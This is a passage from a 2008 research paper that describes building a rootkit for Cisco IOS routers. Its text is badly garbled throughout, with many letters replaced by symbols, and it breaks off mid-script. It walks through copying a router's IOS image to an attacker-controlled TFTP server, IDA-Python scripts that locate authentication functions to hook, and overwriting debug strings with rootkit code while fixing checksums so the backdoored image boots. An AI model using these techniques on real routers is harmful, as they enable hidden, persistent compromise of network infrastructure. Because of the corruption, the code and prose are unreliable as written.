DIK (Da Ios rootKit) Sebastian 'topo' Muiz May 2008 Abstract Rootkits are ery co!!on in !ost operating syste!s" inclu#ing popular $in#o%s" &inu' an# (ni' so)t%are" or any ariant o) those syste!s" ho%eer they are rarely )oun# in e!be##e# OSes* This is #ue to the )act that !ost o) the ti!e e!be##e# OSes hae close# source co#e" %ith the internals o) the so)t%are unkno%n to the public" !aking the reerse engineering process har#er than usual* +n real li)e" it's ery co!!on that once an attacker takes control o) a syste!" he or she %ill %ant to !aintain access to it" an# in an atte!pt to keep those actions un#etecte# a rootkit %ill be installe#* The rootkit seizes control o) the entire OS running on the co!pro!ise# #eice by hi#ing )iles" processes an# net%ork connections" an# allo%ing unauthorize# users to act as syste! a#!inistrators ,, %hile retaining its stealth capabilities an# hi#ing the attacker's presence* This paper #e!onstrates that a rootkit %ith those characteristics can easily be create# an# #eploye# )or a close# source OS like Cisco +OS an# run hi##en )ro! syste! a#!inistrators suriing !ost" i) not all" o) the security !easures that can be #eploye# by e'perts in the )iel#* -s a proo) o) this theory" seeral #i))erent techni.ues )or in)ecting an +OS target %ill be #escribe#" inclu#ing i!age binary patching* /ro! a practical point o) ie%" one o) these techni.ues %ill be i!ple!ente# using a set o) 0ython123 scripts that proi#e the necessary !etho#s to insert a generic rootkit i!ple!entation %ritten in the C progra!!ing language,, calle# 4+5 64a +OS Rootkit7, into the target +OS* Page 1 of 37 Introduction The case o) Cisco +OS 6)or!erly kno%n as the +nternet%ork Operating Syste!7 is uni.ue because it is likely the !ost %i#ely #eploye# routing OS running on the entire +nternet an# a )un#a!ental co!ponent o) !ission critical net%orking operations in al!ost eery organization* 8et%ork #eices are ital to those operations" an# sensitie #ata )lo%s through the! 
eery secon#" !aking the! an e'tre!ely strategic location )or attackers to place rootkits to gather in)or!ation )ro! a target* Syste! a#!inistrators nee# to be prepare# )or the e!ergence o) these types o) threats because the attacks coul# lea# to serious e'ploits" inclu#ing #ata breaches" be)ore they eer realize that so!ething is going on* Security !easures are typically un#ertaken to #etect any abnor!al operations on Cisco #eices" but so!eti!es those !easures !ay not be enough to #etect a#ance# rootkits* These e))orts !ay only uneil high,leel rootkits such as a TC& script 6only recent ersions o) +OS support TC& as a scripting language7" or #eice recon)iguration e'ecute# ia startup,con)ig )ile to alter routes" packet han#ling" etc* These high,leel rootkits are co!parable to user,!o#e rootkits in general purpose operating syste!s such as $in#o%s" &inu' an# OS 9* Only a s!all percentage o) all syste! a#!inistrators per)or! perio#ic security au#its on their organizations: net%ork in)rastructure to #etect )or potential syste! co!pro!ise* These au#its !ay inclu#e 6but are not li!ite# to7 eri)ying router logs" checking e'ternal logs that %ere set by the router %hen a user logge#,in or change# the #eice:s con)iguration" or een by #o%nloa#ing the running +OS i!age to co!pare its checksu! %ith a preiously calculate# alue )ro! the original +OS i!age )ile* To con#uct any o) these actions" the syste! 
a#!inistrator i!plicitly relies on +OS internal )unctions an# trusts the integrity o) the running +OS i!age* +) the #eice is co!pro!ise#" the logging an# syslog )unctions can be altere# to coer the attacker's actions !aking the au#it co!pletely useless* Page 2 of 37 Knowing the enemy Oer the years" Cisco has create# !ultiple har#%are con)igurations 6een using #i))erent C0( architectures ,, !ost co!!only 0o%er0C an# M+0S7 %ith arie# so)t%are )eatures sets 6i*e*" %ireless" ;o+07 to a##ress the nee#s o) its custo!ers* This has re.uire# that the co!pany also !ake !ultiple an# uni.ue +OS ersions aailable because each iteration #e!an#e# a separate buil# process to a##ress the speci)ic )eature set running on the inole# har#%are* The co!bination o) !ultiple har#%are plat)or!s an# )eature sets has resulte# in the aailability o) seeral thousan#s o) uni.ue +OS i!ages that coul# potentially run on a gien set o) #eices* -nother i!portant )actor is that +OS %as not #esigne# to support a##itional !o#ules or allo% )or plug,ins to be loa#e#* $ith all this in !in#" an initial conclusion !ight be that the #eelop!ent o) a generic rootkit that targets +OS !ight be too #i))icult" i) not i!possible" to achiee* <o%eer" this paper %ill #e!onstrate that this challenge can in )act be easily sole# %ith a generic !etho# that a##resses the nee# to !aintain co#e )or !ultiple architectures an# +OS )eature sets" or )or progra!!ing the rootkit core in #i))erent asse!bly languages* IOS Internals Cisco +OS has a !onolithic architecture %hich runs as a single i!age %ith all processes haing access to each other:s !e!ory* 8o !e!ory protection is i!ple!ente# bet%een processes" %hich !eans that a bug in an in#ii#ual process can 6an# probably %ill7 corrupt other processes an# co!pro!ise syste! 
operations" potentially lea#ing to a general )ailure* -nother characteristic o) the Cisco +OS is that its sche#uler )unction is not pree!ptie" as its counterparts on other !o#ern OSes %oul# be* Cisco +OS uses run-to-completion priority scheduling" %hich is an i!proe# /+/O 6/irst,+n" /irst,Out7 sche#uler" co!bine# %ith threa# priorities* This !eans that %hen a process is sche#ule#" it runs until it #eci#es to relinkish the associate# priilege an# !ake a syste! call to allo% other processes to run on the sa!e priority leel or higher* Page 3 of 37 These high,priority processes can =u!p to the hea# o) the line an# run .uickly on the C0(* +) !ultiple processes are %aiting %ith the sa!e priority" they are processe# in the or#er in %hich they're receie# 6=ust like basic /+/O7* 8e%er Cisco +OS i!ages are usually !a#e o) a >2,bit E&/ )ile running on a piece o) har#%are %ith a R+SC processor 6!ost co!!only M+0S or 0o%er0C7* +t's i!portant to note that Cisco engineers !o#i)ie# so!e o) the alues )ro! a stan#ar# E&/ hea#er so that any tool trying to obtain in)or!ation )ro! the )ile %ill )in# lots o) inali# alues" thus !aking initial #iagnostic a little bit annoying* 0ossible i!age !o#i)ication techni.ues to obtain a ali# E&/ )ile %ill be #iscusse# later an# also ho% this is achiee# by 4+5* IOS initial setu on memory This i!age contains a sel),#eco!pressing 6S/97 hea#er that unpacks the )ully )unctional +OS co#e %hich %ill be relocate# in !e!ory #uring run,ti!e* +t is co!presse# because it contains !any strings that occupy precious !e!ory" resources that are nee#e# !ore all the ti!e %ith the continue# arrial o) ne%er +OS ersions %ith a##itional )eature sets* +!age #eco!pression an# relocation inoles seeral steps %hich !ust be un#erstoo# since the i!age #o%nloa#e# )ro! 
the #eice is not the actual i!age that runs %hen the #eice is po%ere# on* -s preiously note#" this is !erely a )ile that sel),#eco!presses at run,ti!e to e'ecute the real +OS OS co#e* So" in or#er to place a back#oor the unco!presse# i!age is nee#e#* /or that reason" the co!presse# +OS i!age is the one that %ill be !anipulate# )irst to unpack it's content" then analyze# as to )igure out ho% to insert 6binary !o#i)y7 the back#oor an# )inally repack the i!age to return in back to the #eice* Repacking the i!age !eans that its checksu!s !ust be recalculate# to re)lect the binary !anipulation that has been co!plete# so that it can pass through initializing tests that %oul# )orbi# the !o#i)ie# i!age )ro! running on the #eice %hen a ali# checksu! is not )oun#* -n +OS co!presse# i!age has the )ollo%ing structure? Page 4 of 37 @,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@ A E&/ hea#er A @,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@ A S/9 co#e A @,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@ ,,@ A Magic 60'/EE4/-CE7 A A @,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@ A A Co!presse# i!age length A A @,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@ A Magic A Co!presse# i!age checksu! A A Structure @,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@ A A (nco!presse# i!age checksu! A A @,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@ A A (nco!presse# i!age length A A @,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@ ,,@ A A A Co!presse# i!age A A A @,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@ The !agic structure is use# by the #eco!pression routine so that it can obtain the alues nee#e# )or the #i))erent checksu!s that are calculate# using the speci)ie# lengths e'presse# in %or#s 6B bytes7* This !eans that i) the speci)ie# length is 202B" then the alue is? 202B %or#s ' B bytes per each %or# C B0DE bytes This structure is also a pointer to the beginning o) the co!presse# co#e* Once the #eice po%ers on" it %ill start the ROM Monitor %hich %ill per)or! seeral steps to loa# the +OS i!age an# %ill use the !agic structure ele!ents #uring this process* This process inoles seen steps? 
2* The ROM Monitor %ill loa# an# position the S/9 i!age at its link a##ress in !e!ory 6either )ro! a )lash boot or a netboot7 as the E&/ hea#er speci)ies* This is %hen the i!age )ile is copie# )ro! the )ile syste! to the #eice !e!ory an# the !ain routine is inoke#* 2* 8o% the !agic structure is locate# using the alue o) a global ariable calle# 'e#ata' that is initialize# by the ROM Monitor* -t this point" this ariable points #irectly to the structure containing the alues nee#e# to checksu! an# #eco!press the i!age* Page 5 of 37 >* The routine in the S/9 i!age then checks to ensure that enough !e!ory is aailable )or #eco!pression using the alue o) the )iel# 'unco!presse# i!age length' o) the !agic structure* +) there is not enough !e!ory aailable" then the co#e returns to the ROM Monitor %ith a so)t%are )orce reloa# signal a)ter generating a !essage containing the te't? FError ? !e!ory re.uire!ents e'cee# aailable !e!oryG* -lso re!e!ber that the return to the !onitor is not inten#e# to occur unless a reloa# %as initiate#* B* - checksu! o) the co!presse# i!age is calculate# an# the result is co!pare# against the alue store# in the )ile to ensure that no corruption has occurre#* The checksu! algorith! is ery si!ple an# %orks using the length )iel# alue 6either the co!presse# or the unco!presse#7 )ro! the !agic structure* The co#e that calculates the checksu! is si!ilar to the )ollo%ing? int n%or#s C co!presse#Hsize I sizeo)6ulong7J unsigne# long su! C 0J II contains the checksu! result unsigne# long al C 0J II te!porary alue unsigne# charK bu)p C 6ucharK7 ptr4ataJ II pointer to II #ata to eri)y %hile 6n%or#s,,7 L al C Kbu)p@@J su! @C alJ i) 6su! 
M al7 L IK There %as a carry KI su!@@J N N O* The co!presse# co#e is then !oe# to a higher !e!ory location an# the PSS section is initialize# %ith zeros* E* The #eco!pression process takes place* The #eco!presse# i!age is also checksu!!e# to ensure there %as no corruption an# i) it )ails" then a !essage containing the te't FError? unco!presse# i!age checksu! is incorrectG is #isplaye#* -lso" the size o) the #eco!presse# i!age is co!pare# against the alue store# in the hea#er to ensure that %as co!pletely success)ul* Q* (sing an internal )unction calle# copyHan#Hlaunch67" the co#e relocation phase takes place !oing the i!age to the speci)ie# Page 6 of 37 a##ress in the E&/ )ile hea#er so the i!age entry point is calle#* +t's %orth !entioning that i) this call returns" then FError? copyHan#Hlaunch67 returne#G is #isplaye#* !he beginning of the end The rootkit %ill locate certain key 6an# usually lo%,leel7 )unctions o) the OS that is being co!pro!ise# to per)or! a binary patch an# then hook the!* These )unctions are strategic co#e locations that %ill allo% the attacker to intercept #ata o) interest* They coul# be groupe# by their )unctionality? Syste! &ogin -uthentication an# authorization /ile syste! access 8et%orking operations 0rocess han#ling +n)or!ation #isplay Syste! &ogs 4ebugging an# core #u!ps This paper %ill #e!onstrate ho% to i#enti)y only so!e o) those )unctions because the i#enti)ication proce#ure is the sa!e )or all o) the!* +n the case o) a close# source OS like Cisco +OS" the )irst thing to #o is i#enti)y the co#e that carries out the inole# )unctions* +n or#er to per)or! an analysis" it is necessary to obtain the i!age running on the target #eice* This can be easily #one by con)iguring an /T0 or T/T0 serer on a !achine controlle# by an attacker" an# then issuing a copy co!!an# on the Cisco #eice co!!an# line like the )ollo%ing? RouterR copy )lash?c2ED2,i,!z*22>,22*bin t)tp?II2Q2*2>*2*22Ic2ED2,i,!z*22>,22*bin ;eri)ying checksu! 
)or Sc2ED2,i,!z*22>,22*bin' 6)ile R 27***1O53 $riting test TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT Page 7 of 37 (ploa# to serer #one /lash #eice copy took 00?00?08 1hh?!!?ss3 RouterR $ith the target +OS i!age #o%nloa#e# it's no% possible to #eco!press it an# then procee# to the analysis phase" !o#i)y the binary an# in)ect it* Though binary patching is not the only %ay to #o this" other possible in)ection !etho#s %ill be e'plaine# later* Chasing the rey Once the )ile %as obtaine#" a )e% steps !ust be )ollo%e# to be able to analyze the +OS i!age an# correctly #etect the preiously !entione# )unctions? 2* -s preiously state#" the i!age insi#e the #eice is co!presse#" so you !ust procee# to #eco!press it* The #eco!pression process is the sa!e as )or any zippe# )ile so it's also possible to use any )ree unzip utility to #o it* Once the i!age is unpacke# the script %ill checksu! it to ensure that there %as no corruption* 2* The #eco!presse# i!age" calle# C2ED2,+,*P+8" !ust be analyze# using +4- 0ro1>3 to obtain crucial in)or!ation )or the rootkit:s surial* This can take seeral !inutes" een hours" because unco!presse# +OS i!age )iles take up seeral !egabytes 6especially those ersions %ith a#ance# )eatures sets7* >* Once +4- )inishes" the i!age %on't be co!pletely analyze# because seeral )unctions an# !ultiple string re)erences %ill be !issing* To a##ress this proble! another script %ill be use#* +t utilizes +4-0ython1B3 to auto!ate the )unction an# string recognition process* The script per)or!s its task in a t%o phase process? 
/irst it'll look )or kno%n seg!ents o) CO4E type an# iterate oer eery instruction aligne# to a B byte !e!ory boun#ary* +) the instruction is not actually part o) a )unction" then the )unction is create# an# +4- takes care o) #etecting its en#* The script then !oes to the instruction a)ter the en# o) the preiously recognize# )unction an# tells +4- that this Page 8 of 37 belongs to a )unction" an# so on* This is #one in +4-,0ython %ith a script like this? class Enhance#-nalysis? RES(&THO5 C 0 RES(&THERR C 2 $-SHPRE-5 C 2 #e) HHinitHH6sel)7? sel)*#ataHsegs C list67 sel)*co#eHsegs C list67 #e) create(nresole#/unctions6sel)7? UUU -nalyze the co#e section to )in# eery non,)unction byte an# create a )unction at that position* This is highly reliable because C+SCO co!piler creates one )unction a)ter another an# eery instruction is aligne# to Bbytes because o) the R+SC arch* UUU print '1@3 0rocessing CO4E seg!ents?' R +terate through each co#e seg!ent aailable )or seg in sel)*co#eHsegs? currHa##ress C seg*startE- counter C 0 initialH)uncsH.ty C getH)uncH.ty67 result C sel)*RES(&THO5 print ' -nalyzing V'WsV'***' W Seg8a!e6seg*startE-7" R Start iteration on eery non,)unction byte until %e R reach the en# o) the current %orking seg!ent* %hile currHa##ress M seg*en#E-? R +) 'cancel' button %as presse#" stop R processing )unctions* i) %asPreak67? result C sel)*$-SHPRE-5 print 'Cancelle#' return R Xet the ne't a##ress that is not a )unction R recognize# by +4-* Page 9 of 37 ne'tHa##ressC)in#HnotH)unc6currHa##ress"SE-RC<H4O$87 i) ne'tHa##ress TC P-4-44R an# V ne'tHa##ress TC 0'////////? i) Make/unction6 ne'tHa##ress" P-4-44R 7 TC 0? counter @C 2 currHa##ress C ne'tHa##ressJ R Check i) %e reache# the en# o) the co#e seg!ent i) getHite!Hsize6 currHa##ress 7 CC 0? break currHa##ress C getHite!Hen#6 currHa##ress 7 R 4etect an inali# ite! or )unction at the R current position* i) currHa##ress CC P-4-44R or V currHa##ress CC 0'////////? 
result C sel)*RES(&THERR break print '4one' print '1@3 Create# a total o) W# ne% )unctions' W counter return result $ith )unctions correctly #etecte#" eery instruction aligne# to a B byte !e!ory a##ress in 4-T- type seg!ents is then iterate# to recognize eery string re)erence belonging to those )unctions* The script per)or!s a##itional checks to ensure that the alues at the !e!ory a##ress being analyze# are a string" instea# o) a re)erence 6pointer7 to it* /or e'a!ple" in a case %here the 4-T- seg!ent begins at 0'Q0E20000" the script tries to #eter!ine i) the alue 0'Q2E2Q>Q> is the string FpassG or a re)erence to the !e!ory a##ress %here a string coul# be store#* 8e't is a part o) the +4-,0ython script that per)or!s those tasks? Page 10 of 37 #e) create(nresole#Strings6sel)7? UUU This )unction conerts eery aligne# string into a +4- string so that it can be re)erence# )ro! the #isasse!bly* Pecause o) R+SC architecture eery string is aligne# to a B byte boun#ary an# the rest o) ,unaligne#, the bytes until the ne't string are pa##e# %ith zeros* UUU re)reshHstrlist60" 0'))))))))7 ne%HstrHcounter C 0 R ne% strings )oun# counter print '1@3 0rocessing 4-T- seg!ents?' R +terate through each co#e seg!ent aailable )or seg in sel)*#ataHsegs? currHa##ress C seg*startE- initialHstrH.ty C getHstrlistH.ty67 print ' -nalyzing V'WsV'***' W Seg8a!e6seg*startE-7" R Re!oe current area )or!at be)ore %e reanalize it* sel)*un#e)ine-rea6currHa##ress" seg*en#E-7 %hile currHa##ress CC P-4-44R or currHa##ressMseg*en#E-? R +) 'cancel' butto! %as presse#" stop R processing strings* i) %asPreak67? print 'Cancelle#' return R Check eery B bytes 6>2 bits align!ent7 i) currHa##ress W B? 
currHa##ress @C B , 6currHa##ress W B7 R Check i) this is a alue rea#y to be conerte# R either to string or #%or#* currHbyte C getHbyte6currHa##ress7 R +) %e )in# a printable or control character" R probably it's a string* i) 6currHbyte YC 0'20 an# currHbyte M 0'Q)7 or V currHbyte CC 0'- or currHbyte CC 0'4 or V currHbyte CC 0'D? Page 11 of 37 R Pe)ore conerting it to a string or #%or#" %e R check seg!ents a##ress space an# co!pare it R %ith the B byte alue at the current a##ress R being processe#* R This %ay %e can #etect any o))set to a R )unction or to a string or #ata in R the sa!e seg!ent or a si!ple string array* R R E'a!ple? +t !ay happen that a string R 'abc#' 60'E2E2E>EB7 is #etecte# as an R o))set i) 0'E2999999 is a ali# seg!ent R a##ress" so this %oul# be an error* R To aoi# this + think %e shoul# not only check R the )irst character but the other" too* #%HcurrHa##ress C getHlong6currHa##ress7 )or co#eHseg in sel)*co#eHsegs? co#eHsegHen#Hea C co#eHseg*en#E- trans)or!Hto C '' i) #%HcurrHa##ress TC 0'////////? i) 66#%HcurrHa##ress YC seg*startE-7 V an# 6#%HcurrHa##ress MC seg*en#E-77V or V 66#%HcurrHa##ressYCco#eHseg*startE-7V an# V 6#%HcurrHa##ress MC co#eHseg*en#E-77? trans)or!Hto C '#%or#' break R 4o not continue checking else? trans)or!Hto C 'string' else? trans)or!Hto C 'string' else? trans)or!Hto C '#%or#' i) trans)or!Hto CC 'string'? R $e #i# not use MakeStr because o) a bug in R +4-0ython an# because %e can't set the R >r# para!eter* i) !akeHasciiHstring6currHa##ress" 0" -SCSTRHC7? ne%HstrHcounter @C 2 else? Make4%or#6currHa##ress7 Page 12 of 37 R Check i) %e reache# the en# o) the seg!ent i) getHite!Hsize6 currHa##ress 7 CC 0? 
break currHa##ress C getHite!Hen#6 currHa##ress 7 print '4one' R Report the nu!ber o) ne% strings )oun# print '1@3 Conerte# W# strings' W ne%HstrHcounter return result -)ter a )e% !inutes" all strings that are not recognize# by +4- 0ro %ill be create# an# seeral ne% strings %ill be )oun#* The )ollo%ing is the script's output to the +4- !essage console? +nitiating enhance# C+SCO +OS analysis*** 1@3 /oun# CO4E seg!ent '*te't' at 0'80008000 1@3 /oun# 4-T- seg!ent '*ro#ata' at 0'80CE-B2B 1@3 /oun# 4-T- seg!ent '*#ata' at 0'822BO-P0 1@3 /oun# 4-T- seg!ent '*s#ata' at 0'822->-/8 1@3 0rocessing CO4E seg!ents? -nalyzing '*te't'*** 4one 1@3 Create# a total o) 2820B ne% )unctions 1@3 0rocessing 4-T- seg!ents? -nalyzing '*ro#ata'*** 4one -nalyzing '*#ata'*** 4one -nalyzing '*s#ata'*** 4one 1@3 Conerte# 2QEQQ> strings 1@3 Enhance# analysis took Q*0> !inutes -s you can see" once the script )inishes" the i!age is rea#y to use an# can be e'a!ine# by the attacker to gain kno%le#ge o) Cisco +OS internals using all the ne% in)or!ation ac.uire# by +4-* Success)ul +OS i!age analysis is ery i!portant because it contains plenty o) #ebugging strings to proi#e erbose in)or!ation to the syste! 
a#!inistrator about the OS state* Those #ebug strings %ill be use# as a starting point to #etect the key )unctions o) the OS an# because it's kno%n )or sure that these strings re!ain the sa!e across !ultiple +OS ersions* Page 13 of 37 "esistance is futile So!e o) those interesting )unctions !ight not be locate# because o) co!piling issues or it !ight not be possible to retriee any string re)erences in so!e cases si!ply because they #o not use any strings at all* -s state# be)ore" the +OS contains plenty o) strings" !ost o) %hich o))er #ebugging in)or!ation" an# others that !erely output co!!only seen !essages to the user ter!inal* These !essages can be locate# in )unctions close to those that %e are looking )or" an#" kno%ing that they %ill not be !oe# by the co!piler" it's possible to try to )in# these 'neighbor' )unctions an# then i#enti)y the ones releant to the rootkit )unctionality an# hook the!* /unction reor#ering is co!!on on !o#ern co!pilers" but this is not the case in the co!piler use# by Cisco so our approach is reliable in this scenario* +4- 0ython %ill be use# to help us to locate the necessary strings an# the co#e re)erences attache# to the!* /or this purpose" a class %as create# insi#e o) the script that %ill per)or! the binary patch* This class %ill take a list o) pre#e)ine# strings an# %ill per)or! the search operation returning to a list o) cross, re)erences 6+4-'s 're)s7 to those strings* The !e!ory location re)erencing those strings is the !e!ory location o) the inole# )unctions" so no% it's =ust a !atter o) asking +4- about the beginning o) the )unction to kno% %here a =u!p to the rootkit co#e can be inserte#* The location o) neighbor )unctions is not necessarily i!!e#iate to the one nee#e# )or the rootkit" there coul# be another )unction %ithout any string re)erences separating the!" but this approach %ill still succee#* To illustrate the )unctions recognition !etho# a )unctions layout %ill be sho%n ne't as an e'a!ple? 
Page 14 of 37 @,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@ A neighborH!inusH2 A M, uses a uni.ue string* @,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@ A neighborH!inusH2 A @,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@ A A A chkHpass A M, )unction o) interest A A )or the rootkit @,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@ A neighborHplusH2 A @,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@ A neighborHplusH2 A @,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@ +n the case that the )unction chkHpass67 #oesn't contain any string but the )unction neighborHplus267 #oes" the )ollo%ing steps !ust be acco!plishe# to locate the chkHpass67 )unction? 2* +terate through the list o) strings on +4- to search )or the strings re)erence# by )unction neighborHplus267* +n +4-,0ython this can be #one by a si!ple )unction like this? #e) )uncString6stringHtoH)in#7? UUU/unction to )in# the speci)ie# string a!ong allUUU R Re)resh the list o) +4- strings re)reshHstrlist60" 0'////////7 R Store in)or!ation about the speci)ie# string stringHin)o C stringHin)oHt67 R +terate through eery string aailable )or i in range6getHstrlistH.ty677? R Xet the current string ite! to co!pare against the list getHstrlistHite!6i" stringHin)o7 i) len6stringHtoH)in#7 CC stringHin)o*length? R /oun# )lag stringH!iss!atch C /alse R Pyte,to,byte co!parison is .uicker that entire string )or = in range6stringHin)o*length7? i) or#6stringHtoH)in#1=37 TC Pyte6stringHin)o*ea@=7? stringH!iss!atch C True Page 15 of 37 R return string a##ress i) stringH!iss!atch CC /alse? return stringHin)o*ea return 0 R string not )oun# 2* Obtain a list o) eery #ata re)erence 6+4- calls it '#re)' ,, a re)erence to a #ata in the speci)ie# !e!ory a##ress7 to the string use# to i#enti)y the )unction chkHpass67 %ith the )ollo%ing co#e? #e) get4ataRe)s6stringHa##ress7? R Store the list o) #ata re)erences to the speci)ie# string stringH#re)s C list67 re) C getH)irstH#re)Hto6stringHa##ress7 %hile re) TC P-4-44R? R Check i) list is e!pty to aoi# )urther ali#ations i) len6stringH#re)s7? 
R Check i) preious re) is the sa!e* R E'planation is in the te't bello% TTT i) 6stringH#re)s1,23 @ B7 CC re)? continue else? R -## the )irst re)erence to the list stringH#re)s*appen#6re)7 stringH#re)s*appen#6re)7 re) C getHne'tH#re)Hto6stringHa##ress" re)7 return stringH#re)s 5eep in !in# that in R+SC architectures the !e!ory re)erence alues are loa#e# using t%o instructions because a >2,bit !e!ory a##ress cannot be re)erence# #irectly using only B byte instructions* This %ay t%o #ata re)erences %ill be issue# 6one to re)er to the upper 2 bytes" an# another )or the lo%er 2 bytes7 that still belong to the sa!e source co#e* 4ue to the )act that the co!piler puts those t%o instructions together" a check is issue# to eri)y i) the last appen#e# re)erence# a##ress" plus B" is e.ual to the current re)erence* +t %ill happen that +4- %ill #etect &- 6&oa# -##ress7 !acro Page 16 of 37 instruction in M+0S* 4o not con)use this %ith 0o%er0C &- 6&oa# -##ress7 instruction" %hich is a !acro )or the -44+ instruction* -n e'a!ple o) string pointer loa# on 0o%er0C #isasse!bly )ollo%s? *te't?802C>Q40 lis WrE" a;eri)y0assZh R U;eri)y passU *te't?802C>Q4B a##i WrE" WrE" a;eri)y0assZl R U;eri)y passU The &+S 6&oa# +!!e#iate Shi)te#7 loa#s the upper 2 bytes o) the !e!ory a##ress o) the string in register RE %hile the instruction -44+ 6-## +!!e#iate7 loa#s the lo%er 2 bytes to RE* 8o% the register contains the !e!ory a##ress o) the string*
+n an +OS i!age running on M+0S architecture" the )ollo%ing #isasse!bly co#e is obtaine#? *te't?E020208B la [a>" a;eri)y0ass R U;eri)y passU The &- 6&oa# -##ress7 !acro instruction is recognize# by +4- but it is not a real instruction because it's a !acro %rapping the )ollo%ing co#e? *te't?E020208B lui [a>" 0'E228 R U;eri)y passUZh *te't?E0202088 a##iu [a>" 0'Q>>B R U;eri)y passUZl The )irst instruction is &(+ 6&oa# (pper +!!e#iate7 an# loa#s the 2 upper bytes into register -> an# then the instruction -44+( 6-## +!!e#iate (nsigne#7 a##s the 2 lo%er bytes !aking register -> a pointer to the !e!ory a##ress containing the string* >* 8o% the !e!ory a##ress containing the co#e that re)erences the string in )unction neighborH!inusH267 is kno%n* +t's also kno%n that the )unction chkHpass67 is t%o )unctions a%ay )ro! the )unction neighborH!inusH267 so it can be resole# easily using +4-,0ython? R 're)H)oun# contains the a##ress o) the co#e re)erencing R the string that %as preiously obtaine#* )nHneighborH!inusH2 C getH)unc6're)H)oun#7 )nHneighborH!inusH2 C getHne'tH)unc6)nHneighborH!inusH2*startE-7 )nHchkHpass C getHne'tH)unc6)nHneighborH!inusH2*startE-7 Page 17 of 37 )irstHinstHa##ress C )nHchkHpass*startE- $ith those easy steps" the !e!ory a##ress o) the )irst instruction pointing to the )unction prologue %ill be obtaine#* The )unction prologue %ill be replace# by a hook to =u!p to our co#e but this %ill be e'plaine# in #etail later* -lso note that the neighbor )unction coul# be locate# at any #istance or )ro! any #irection 6be)ore or a)ter7 )ro! 
the )unction chkHpass67 so this approach %ill still %ork because the co!piler puts one )unction a)ter another as #eclare# in the source co#e* #ome sweet home The rootkit location !ust be #eci#e# be)ore any i!age patching takes place 6%hether it is on the )ile or at run,ti!e7 because the patches applie# at the beginning o) eery )unction %ill =u!p to the rootkit co#e an# they !ust kno% its !e!ory location* Taking a#antage o) +OS !e!ory !anage!ent protection 6or the lack o) it7 rootkit co#e %ill be %ritten on the 4-T- seg!ent by sacri)icing a #ebug string %hich %ill al!ost probably neer be use#* Cisco +OS has plenty o) these strings an# !ost o) the! are co!!on along seeral ersions 6i) not all7* \ust in case the syste! a#!inistrator #eci#es to use so!e +OS )eature that re.uires that string" a 8(&& character %ill be %ritten at the )irst character to aoi# string #isplaying proble!s an# also to aoi# user suspicion* To )in# a speci)ic string" re)er to the preious section %ere +4-,0ython is use# )or this purpose* There are seeral %ays to insert the rootkit co#e in the )ile an# they are all %ell kno%n )or any &inu' irus %riter because it's !ainly a stan#ar# E&/ in)ection proce#ure1O31E3* /or e'a!ple" kno%ing that eery E&/ section is aligne# to a !e!ory page size" one possible techni.ue is to use the unuse# space bet%een sections* This re.uires section length !o#i)ications on the E&/ hea#er but this is easy to achiee* -nother %ay to in)ect the i!age is a##ing ne% sections at the en# o) the )ile" but this re.uires e'tensie E&/ hea#er an# sections hea#er table !o#i)ications* Page 18 of 37 8o #etaile# e'planation %ill be gien about those techni.ues" an# only )or the sake o) clarity is it !entione# that oer%riting an e'isting string resource in the )ile is the !etho# chosen because it #oesn't re.uire any E&/ hea#er !anipulations* This !etho# is the easiest in this case because +OS i!ages contain ery long strings that are rarely use# an# there is no nee# to !o#i)y the E&/ hea#er 
alues because eery section an# seg!ent re!ains the sa!e* The #o%nsi#e o) this !etho# is that it re.uires a bigger )ootprint because o) the sacri)ice o) #ebug strings %hich coul# co!pro!ise our rootkit presence on the syste!* -s !entione# at the beginning o) the paper" the rootkit core %ill be i!ple!ente# in plain C so %e !ust co!pile the rootkit an# e'tract )ro! it the )unctions %hich per)or! the tasks nee#e# ,, %ithout the %hole i!age hea#ers 6%e %ill probably setup XCC1Q3 to cross, co!pile183 to 0o%er0C,E&/ or to M+0S,E&/" so E&/ )ile hea#ers !ust be aoi#e#7* -)ter e'tracting the rootkit co#e )ro! the resulting )ile" a chunk o) bytes %ill be obtaine# an# this is the co#e that %ill be %ritten oer the selecte# string" but this %ill be coere# in #etail later* +n so!e cases the 4-T- seg!ent per!issions 6in %hich the string resi#es7 nee# to be change# to R$9 6Rea#,$rite,e9ecute7 because those sections %ere preiously use# to allocate strings an# no co#e e'ecution capability %as re.uire# )ro! the!* +n case the attacker pre)erre# to create an a##itional section in the i!age )ile" E&/ )ile hea#er !o#i)ication or any other operation on the )ile sections or seg!ents" coul# be easily #one %ith the 0yEl)1D3 library specially create# )or this pro=ect* +t is also possible to change )ile section per!issions to a## E9EC using our 0yEl) as sho%n in the )ollo%ing e'a!ple? )ro! pyel) i!port El) )ro! sections i!port S</HE9EC+8STR iosH)ilena!e C 'C2ED2,+,*P+8' el) C El)6iosH)ilena!e7 R -ssu!ing that section nu!ber > is '*te't' #ataHsec C el)*sections1>3 print '1,3 Ol# )lags? Ws' W #ataHsec*get/lagsString67 Page 19 of 37 R -##ing E9EC )lag print '1,3 -##ing S</HE9EC+8STR )lag? Ws' W S</HE9EC+8STR123 #ataHsec*set/lags6#ataHsec*get/lags67 A S</HE9EC+8STR1037 print '1,3 8e% )lags? 
